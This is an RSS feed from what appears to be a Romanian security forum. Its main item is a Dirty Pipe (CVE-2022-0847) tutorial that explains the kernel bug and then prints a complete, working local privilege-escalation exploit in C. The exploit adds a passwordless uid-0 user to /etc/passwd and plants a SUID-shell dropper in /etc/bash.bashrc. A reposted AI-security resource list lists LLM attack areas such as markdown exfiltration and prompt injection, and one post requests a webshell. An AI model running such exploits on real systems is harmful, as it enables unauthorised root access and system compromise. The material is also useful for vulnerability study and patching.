			
				huntr.com
			
		
		
			
				Anthropic Bug Bounty
			
			
				Claude, API
			
			
				anthropic.com/security
			
		
		
			
				Microsoft (Copilot, Azure AI)
			
			
				Copilot, Azure OpenAI
			
			
				msrc.microsoft.com
			
		
		
			
				Huntr (AI/ML focused)
			
			
				Open source ML libraries
			
			
				huntr.com
			
		
	



	Tips for AI bug bounty:
 


	
		Focus on data exfiltration via markdown rendering (common finding)
	
	
		Test plugin/tool integrations thoroughly
	
	
		Look for prompt injection in RAG pipelines
	
	
		Explore memory and persistent context manipulation
	
	
		Check for cross-tenant data leakage in multi-user deployments
	




	
		Community &amp; News
	



	
		Communities
	



	
		AI Village — DEF CON's AI security community
	
	
		OWASP AI Exchange — Open standard for AI security
	
	
		ProtectAI — AI security research and tools
	
	
		Embrace the Red — Blog — Leading blog on LLM security
	
	
		Kai Greshake's Research — Indirect prompt injection research
	



	
		Newsletters &amp; Blogs
	



	
		The Batch — DeepLearning.AI — Weekly AI news
	
	
		Simon Willison's Weblog — Authoritative LLM security commentary
	
	
		HiddenLayer Research — AI security research
	
	
		Lakera Blog — LLM security insights
	
	
		PortSwigger Research — Web + AI security research
	




	
		Suggested Learning Path by Experience Level
	



	
		🟢 Beginner (0–3 months)
	



	
		Complete PortSwigger Web Security Academy fundamentals
	
	
		Learn Python basics
	
	
		Take Google ML Crash Course
	
	
		Read OWASP LLM Top 10
	
	
		Play Gandalf — all levels
	
	
		Read Simon Willison's prompt injection article
	
	
		Watch Andrej Karpathy — Intro to LLMs
	



	
		🟡 Intermediate (3–9 months)
	



	
		Study MITRE ATLAS Matrix
	
	
		Complete PortSwigger LLM Attack labs
	
	
		Set up and exploit Damn Vulnerable LLM Agent
	
	
		Complete Prompt Airlines and Crucible challenges
	
	
		Read the LLM Hacker's Handbook
	
	
		Study the Embrace the Red blog in full
	
	
		Experiment with Garak and PyRIT
	
	
		Try Offensive ML Playbook
	



	
		🔴 Advanced (9+ months)
	



	
		Participate in AI Village CTF at DEF CON
	
	
		Submit findings to Huntr or OpenAI Bug Bounty
	
	
		Study adversarial ML with ART and CleverHans
	
	
		Read academic papers on model inversion, membership inference, and data extraction
	
	
		Contribute to open source tools like Garak or AI Exploits
	
	
		Build your own vulnerable LLM demo environment
	
	
		Write and publish research — blog posts, CVEs, conference talks
	




	
		Key Academic Papers
	



	
		
			
				Paper
			
			
				Year
			
		
	
	
		
			
				Explaining and Harnessing Adversarial Examples — Goodfellow et al.
			
			
				2014
			
		
		
			
				Extracting Training Data from Large Language Models — Carlini et al.
			
			
				2021
			
		
		
			
				Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al.
			
			
				2023
			
		
		
			
				Membership Inference Attacks against Machine Learning Models — Shokri et al.
			
			
				2017
			
		
		
			
				Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al.
			
			
				2023
			
		
		
			
				Jailbroken: How Does LLM Safety Training Fail? — Wei et al.
			
			
				2023
			
		
		
			
				Prompt Injection attack against LLM-integrated Applications
			
			
				2023
			
		
	




	Last updated: 2025 | Contributions welcome — submit a PR with new resources.
 


	 
 


	Sursa: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection]]></description><pubDate>Fri, 27 Feb 2026 14:26:49 +0000</pubDate></item><item><title>[Q] Sfaturi pentru un viitor in CyberSecurty?</title><link><![CDATA[https://rstforums.com/forum/topic/124054-q-sfaturi-pentru-un-viitor-in-cybersecurty/?do=findComment&comment=701770]]></link><description>Vreau sa incep sa lucrez la ceva pentru viitorul meu, cu ce ar trebuii sa incep pentru un viitor legat de securitatea cibernetica?</description><pubDate>Thu, 26 Feb 2026 23:01:50 +0000</pubDate></item><item><title>Malwarebytes Smoking Crack (0day + Banger Song)</title><link><![CDATA[https://rstforums.com/forum/topic/124044-malwarebytes-smoking-crack-0day-banger-song/?do=findComment&comment=701736]]></link><description>Ati vazut asta? 
 


	 
 


	#UwU Underground</description><pubDate>Sat, 21 Feb 2026 11:35:46 +0000</pubDate></item><item><title>Linux Kernel Dirty Pipe Exploitation (Logic Bug &#x2014; CVE-2022&#x2013;0847)</title><link><![CDATA[https://rstforums.com/forum/topic/124041-linux-kernel-dirty-pipe-exploitation-logic-bug-%E2%80%94-cve-2022%E2%80%930847/?do=findComment&comment=701707]]></link><description><![CDATA[by: Antonius (w1sdom) 
	https://www.bluedragonsec.com 
	https://github.com/bluedragonsecurity
 


	 
 


	Dirty Pipe (CVE-2022–0847) is one of the most significant security vulnerabilities in Linux Kernel 5.8–5.15.24, discovered by Max Kellermann in 2022. This vulnerability allows ordinary users (without special privileges) to overwrite data in files that should be read-only.
 


	6.3.3.1. Understanding Core Concepts



	Before discussing Dirty Pipe in detail, here are some Linux kernel internal concepts that need to be understood:
 


	1. Paging



	Paging is a memory management mechanism in the Linux kernel where the memory system divides physical memory into fixed-size small blocks called page frames, and virtual memory is divided into blocks of the same size called pages.
 


	This mechanism allows the kernel to map virtual address space of processes to physical memory in a non-sequential manner, which is crucial for efficiency and security in modern systems.
 


	2. Page (Virtual Memory)



	In Linux, a page is the smallest unit of physical memory management handled by the kernel.
 


	Analogy: RAM is like a giant book. A page is one sheet of paper in that book. The kernel doesn’t move data bit by bit, but rather sheet by sheet (page by page).
 


	Generally, on modern system architectures (such as x86_64), the standard size of one page is 4 KB (4096 bytes).
 


	3. Page Cache



	This is a crucial part. Linux doesn’t read files directly from disk every time because it’s slow. The kernel copies file contents into RAM called the Page Cache.
 


	
		When we read a file, the kernel loads it into the Page Cache.
	
	
		If another process wants to read the same file, the kernel only provides a reference to the page that already exists in that memory.
	



	Page cache resides in kernel space.
 


	4. Pipe Buffer



	Pipe is an Inter-Process Communication (IPC) mechanism. Internally, the kernel manages pipes using the pipe_inode_info data structure. Data inside a pipe is stored in a “buffer” called Pipe Buffer.
 


	
		Ring Buffer: The kernel uses a circular (ring) structure to manage this buffer. A ring buffer is a data structure that uses a single array with a fixed size as if its end is connected back to its beginning. This creates a data flow that “rotates” endlessly.
	
	
		Flags: Each buffer has attributes or “flags” that determine its behavior (for example, whether the buffer can be merged).
	



	Pipe buffer resides in kernel space.
 


	5. Pipe Buffer Flag (PIPE_BUF_FLAG_CAN_MERGE)



	The PIPE_BUF_FLAG_CAN_MERGE flag was introduced in Linux Kernel version 5.8.
 


	This is where the main vulnerability lies. The flag named PIPE_BUF_FLAG_CAN_MERGE.
 


	
		Its function: Tells the kernel that new data written to the pipe can be merged into an existing buffer.
	
	
		The problem: Before the Dirty Pipe fix, the kernel did not properly clear (reset) this flag when performing splice().
	



	6. Splice



	splice() is a syscall for moving data between two file descriptors without copying the data between kernel space and user space. This is often referred to as a Zero-copy mechanism.
 


	The splice() syscall is the “main actor” in Dirty Pipe:
 


	
		Instead of physically copying data, splice() performs optimization by making the Pipe Buffer point directly to the page in the Page Cache.
	
	
		This means the pipe doesn’t contain a copy of the file data, but only a “pointer” to the file’s physical memory.
	



	7. Copy on Write (CoW)



	The Copy-on-Write (CoW) mechanism is a memory management optimization strategy used by the Linux kernel to delay data copying until absolutely necessary.
 


	The relationship between Copy-on-Write (CoW) and the Dirty Pipe exploit (CVE-2022–0847) is about how a small bug in the Linux kernel successfully “tricks” the CoW mechanism, allowing data to be written to files that should be read-only.
 


	8. Dirty Page



	A dirty page is a memory page in RAM that has been modified by an application, but the changes have not yet been written back to secondary storage (such as SSD or hard disk).
 


	6.3.3.2. Analysis of Dirty Pipe Vulnerability



	Dirty Pipe is a type of logic bug in pipe buffer handling in Linux kernel 5.8 through Linux kernel 5.15.24.
 


	The main problem lies in the Pipe mechanism (inter-process communication channel) and how the kernel manages the Page Cache (memory that stores copies of file data from disk).
 


	The core issue is a bug in the PIPE_BUF_FLAG_CAN_MERGE flag.
 


	The main problem lies in the kernel’s failure to properly re-initialize this flag (logic bug). Here is the code analysis:
 


	In the copy_page_to_iter_pipe and push_to_pipe functions in the Linux kernel before version 5.16.11, when performing splice operations, the kernel prepares the pipe_buffer structure but forgets to clean the .flags member.
 


	Vulnerable Code Structure:
 


	 
 


	Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h
 

// Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags; // &lt;--- THIS FLAG IS NOT RESET
    unsigned long private;
};


	Code Before Patch (Vulnerable):
 

// lib/iov_iter.c - Before CVE-2022-0847 patch
static size_t copy_page_to_iter_pipe(struct page *page,
    size_t offset, size_t bytes, struct iov_iter *i) {
    // ---------snip-----------
    struct pipe_buffer *buf = &amp;pipe-&gt;bufs[head &amp; mask];

    buf-&gt;ops = &amp;page_cache_pipe_buf_ops;
    buf-&gt;page = page;
    buf-&gt;offset = offset;
    buf-&gt;len = bytes;
    // PROBLEM: buf-&gt;flags NOT TOUCHED AT ALL
    // --------snip----------------------
}


	Code After Patch (Fixed):
 

buf-&gt;ops = &amp;page_cache_pipe_buf_ops;
buf-&gt;page = page;
buf-&gt;offset = offset;
buf-&gt;len = bytes;
buf-&gt;flags = 0; // &lt;--- TOTAL RESET TO ZERO


	Why is buf-&gt;flags = 0 better than just turning off a specific flag? Because pipe_buffer is a reused structure. If we only turn off one flag (CAN_MERGE), other garbage flags from previous pipe usage (such as PIPE_BUF_FLAG_GIFT or other custom flags) might still remain and cause strange behavior or new security holes in the future. Setting it to 0 ensures the buffer is in a completely “clean” state.
 


	Why Can This Be Exploited?



	Here is the Dirty Pipe exploitation flow:
 


	
		Pollution Stage: The attacker inserts data into the pipe via write(). A regular write() operation will set buf-&gt;flags = PIPE_BUF_FLAG_CAN_MERGE.
	
	
		Drain Stage: The attacker reads that data. The buffer is now logically “empty”, but its structure still exists in kernel memory with the CAN_MERGE flag still active.
	
	
		Splice Stage: When the splice() syscall maps a read-only file to a pipe, the copy_page_to_iter_pipe() function is called. Due to the bug above, it fills buf-&gt;page with the original file’s memory page but doesn’t reset buf-&gt;flags.
	
	
		Execution: The kernel thinks this file buffer can still be merged. The next write to the pipe won’t create a new buffer, but will actually modify directly the memory page (Page Cache) that was mapped earlier.
	



	At this stage, the attacker’s data is already stored in RAM. A page in RAM whose contents differ from what’s on disk is called a “Dirty Page”.
 


	If this stage is successfully reached, it means the exploitation has succeeded! Once the Page Cache changes, the effect is instant. If we overwrite /etc/passwd in RAM, we can immediately run su root at that very moment.
 


	6.3.3.3. Dirty Pipe Exploitation



	For Dirty Pipe exploitation, we don’t need to disable any kernel protections because all kernel protections are irrelevant to prevent this logic bug.
 


	To exploit the Dirty Page logic bug, our exploit will perform the following steps:
 


	Step 1. Prepare the pipe and fill the pipe until full with the goal of triggering the PIPE_BUF_FLAG_CAN_MERGE flag.
 

pipe(p);
int capacity = fcntl(p[1], 1032);
static char dummy[4096];
for (int r = capacity; r &gt; 0; ) {
    int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
    write(p[1], dummy, n);
    r -= n;
}


	Step 2. Empty the pipe.
 

for (int r = capacity; r &gt; 0; ) {
    int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
    read(p[0], dummy, n);
    r -= n;
}


	Step 3. Use splice() to insert data from the target file into the pipe.
 

if (splice(fd, &amp;offset, p[1], NULL, 1, 0) &lt; 0) {
    perror("[-] splice failed");
    return 0;
}


	Step 4. Write the payload data to the pipe.
 

write(p[1], payload, strlen(payload));


	Complete Exploit Code for Dirty Pipe Exploitation
 

/*
Exploit Title: Linux Kernel 5.8 &lt; 5.15.25 - Local Privilege Escalation (DirtyPipe 2)
Exploit Author: Antonius (w1sdom)
github : https://github.com/bluedragonsecurity
web : https://www.bluedragonsec.com

tested on :
- linux kernel 5.13.0-21-generic (compiled on lubuntu 20.04.5)
- linux lubuntu 20.04.2 - linux kernel 5.8

Original Author: Max Kellermann (max.kellermann@ionos.com)
CVE: CVE-2022-0847

 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann &lt;max.kellermann@ionos.com&gt;
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include &lt;unistd.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/utsname.h&gt;
#include &lt;ctype.h&gt;

int validate_kernv() {
    struct utsname buffer;
    int major, minor, patch;
    int is_vulnerable = 0;
    char *version_str;
    int len, compile_year;

    if (uname(&amp;buffer) != 0) {
        perror("uname");
        return 1;
    }
    version_str = buffer.version;
    len = strlen(version_str);
    compile_year = 0;
    for (int i = len - 4; i &gt;= 0; i--) {
        if (isdigit(version_str[i]) &amp;&amp; isdigit(version_str[i+1]) &amp;&amp; 
            isdigit(version_str[i+2]) &amp;&amp; isdigit(version_str[i+3])) {
            compile_year = atoi(&amp;version_str[i]);
            break;
        }
    }
    if (compile_year &lt; 2023) {
        is_vulnerable = 1;
    }
    int fields = sscanf(buffer.release, "%d.%d.%d", &amp;major, &amp;minor, &amp;patch);
    if (fields &lt; 3) patch = 0;
    if (major == 5) {
        if (minor &gt;= 8 &amp;&amp; minor &lt;= 14) {
            is_vulnerable = 1;
        }
        else if (minor == 15 &amp;&amp; patch &lt; 25) {
            is_vulnerable = 1;
        }
    }
    else {
        printf("[-] kernel is not vulnerable !!! quitting ...");
        exit(-1);
    }
    
    if (is_vulnerable) {
     printf("[*] kernel is vulnerable\n");
    }
    else {
     printf("[-] kernel is not vulnerable !!! quitting ...");
        exit(-1);
    }

    return 0;
}

void prepare_pipe(int p[2]) {
    pipe(p);
    int capacity = fcntl(p[1], 1032);
    static char dummy[4096];
    for (int r = capacity; r &gt; 0; ) {
        int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
        write(p[1], dummy, n);
        r -= n;
    }
    for (int r = capacity; r &gt; 0; ) {
        int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
        read(p[0], dummy, n);
        r -= n;
    }
}

int inject_payload(char *target, char *payload) {
    int fd = open(target, O_RDONLY);
    int p[2];
    __off64_t offset = 1; 

    prepare_pipe(p);
    fd = open(target, O_RDONLY);
    if (fd &lt; 0) return 1;
    if (splice(fd, &amp;offset, p[1], NULL, 1, 0) &lt; 0) {
        perror("[-] splice failed");
        return 0;
    }
    printf("[*] injecting payload to %s\n", target);
    write(p[1], payload, strlen(payload));

    return 1;
}

void bashrc() {
    char *target = "/etc/bash.bashrc";
    char *payload = "\ncp /bin/bash /tmp/x; chmod +s /tmp/x\n#";
    if (inject_payload(target, payload) == 0) {
        printf("[-] failed to inject payload !");
    }
    else {
     printf("[*] payload injected to %s\n", target);
     printf("[*] you need to wait for root to login\n");
     printf("[*] once the root logged in you will get suid shell on /tmp/x\n");
     printf("[*] get root by : /tmp/x -p\n");
    }
}

int toor_check() {
    FILE *fp;
    char path[1035];

    fp = popen("su toor -c id", "r");
    if (fp == NULL) {
        return 0;
    }
    if (fgets(path, sizeof(path), fp) != NULL) {
        if (strstr(path, "root")) {
            return 1;
        } 
    }
    pclose(fp);

    return 0;
}

int passwd() {
    char *target = "/etc/passwd";
    char *payload = "\ntoor::0:0:root:/root:/bin/bash\n#";
    
    system("cp /etc/passwd /tmp/passwd.bak");
    if (inject_payload(target, payload) == 0) {
        printf("[-] failed to inject payload !");
    }
 if (toor_check() == 1) {
        printf("[+] exploitation success, getting root for you.\n");
        system("su toor");
    }
    else {
        printf("[-] failed on method 1, testing method 2\n");  
        return 0;      
    }

    return 1;
}

int main() {
    validate_kernv();
    if (passwd() == 0) {
        bashrc(); 
    }

    return 0;
}


	Note: The complete exploit code contains functions for kernel version validation, pipe preparation, payload injection, and two different exploitation methods targeting /etc/passwd and /etc/bash.bashrc.
 


	Exploitation Methods



	The exploit above uses 2 different payloads with the goal that if the first payload fails, it will be chained by the second payload.
 


	Payload 1: Writes to /etc/passwd to add a new user named ‘toor’ with uid 0. If this payload succeeds, we can immediately get root shell.
 


	Payload 2: Aims to drop a SUID bash shell at /tmp/x. Specifically for the second payload, it must wait for the root user on the system to login because the payload to drop the SUID shell is injected into /etc/bash.bashrc. In Linux, commands contained in /etc/bash.bashrc are executed by every user who logs into the system at login time.
 


	#
 


	Testing the Exploit



	In this example, I used Linux kernel 5.13 running on Lubuntu 20.04.5 in VirtualBox as a guest OS and the host OS is Kali Linux 2025.4.
 


	On the Lubuntu 20.04.5 machine, compile the exploit:
 


	gcc -o dirtypipe2 dirtypipe2.c
 


	Run the exploit:
 


	./dirtypipe2
 


	and finally, we got root shell :



	Press enter or click to view image in full size
	
		 
	



	
 


	References



	Original disclosure: https://dirtypipe.cm4all.com/
 


	CVE-2022–0847: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847
 


	Linux Kernel patch: commit 9d2231c5d74e13b2a0546fee6737ee4446017903
 


	Exploit code: https://github.com/bluedragonsecurity]]></description><pubDate>Thu, 19 Feb 2026 07:14:59 +0000</pubDate></item><item><title>Hello from Indonesia</title><link><![CDATA[https://rstforums.com/forum/topic/124040-hello-from-indonesia/?do=findComment&comment=701706]]></link><description>Hello buddy ! 
 


	I am from Indonesia, 
 


	I am a Chinese born in Indonesia.
 


	 
 


	I just notice this forum after doing google search for a linux kernel rootkit that I created in 2014. 
 


	 
 


	Here's the topic : 
 



	 
 


	I thinks this forum is cool and it will be nice to register here , in my past time, I have some friends from Europe
 


	some Albanian hacker friends in my past time  such as x-hack, danzel
 


	a greece friend : getch
 


	 
 


	is Romania near to Albania and Greece ?</description><pubDate>Thu, 19 Feb 2026 07:11:55 +0000</pubDate></item><item><title>Client OPNsense (pFsense)</title><link><![CDATA[https://rstforums.com/forum/topic/124039-client-opnsense-pfsense/?do=findComment&comment=701683]]></link><description>Bun&#x103; seara 
 


	&#xCE;ncerc de ceva timp s&#x103; &#xEE;nlocuiesc un router comercial "de top" cu un mini pc pe care am instalat OPNsense (&#x219;i &#xEE;nainte pfSense).
 


	Acest mini pc transformat &#xEE;n router doresc s&#x103; devin&#x103; clientul mai multor servere VPN.
 


	Certificatele sunt emise de routere consumer &#x219;i nu au formatul necesar (X.509). Ce solu&#x21B;ii a&#x219; avea? Un tutorial ? 
 


	P.S sunt un novice 
 


	Mul&#x21B;umesc</description><pubDate>Sun, 15 Feb 2026 17:49:12 +0000</pubDate></item><item><title>Cum merge bosilor hackereala pe la birou ?</title><link><![CDATA[https://rstforums.com/forum/topic/124030-cum-merge-bosilor-hackereala-pe-la-birou/?do=findComment&comment=701565]]></link><description>Bosilor, cum merge hackareala pe la biroul de corporatristi ?? N-am mai intrat de anul trecut. La mine merge de rupe... In ianuarie a bubuit treaba, peste 1,5 milioane de coco venit. Chinezii de la Huione au ajuns la 10-20 de miliarde de coco furati anul trecut... deci sunt un pestisor pe langa chinezii aia...
 


	 
 


	Pe la voi la birou cum merge cu hackareala ?? Gasiti bug-uri din alea sa va platiti ratele si sa cumparati pateul bucegi ? Va mai sponsorizeaza astia sa mergeti pe la 2-3 conferinte pe an ca sa adormiti prin sala ???</description><pubDate>Tue, 03 Feb 2026 23:25:46 +0000</pubDate></item><item><title>Webshell needed</title><link><![CDATA[https://rstforums.com/forum/topic/124028-webshell-needed/?do=findComment&comment=701563]]></link><description>Salut,
 


	 
 


	Am nevoie de un webshell mai recent, are careva? Vreau sa rulez niste teste la un EDR.
 


	 
 


	Mersi</description><pubDate>Mon, 02 Feb 2026 08:53:19 +0000</pubDate></item></channel></rss>
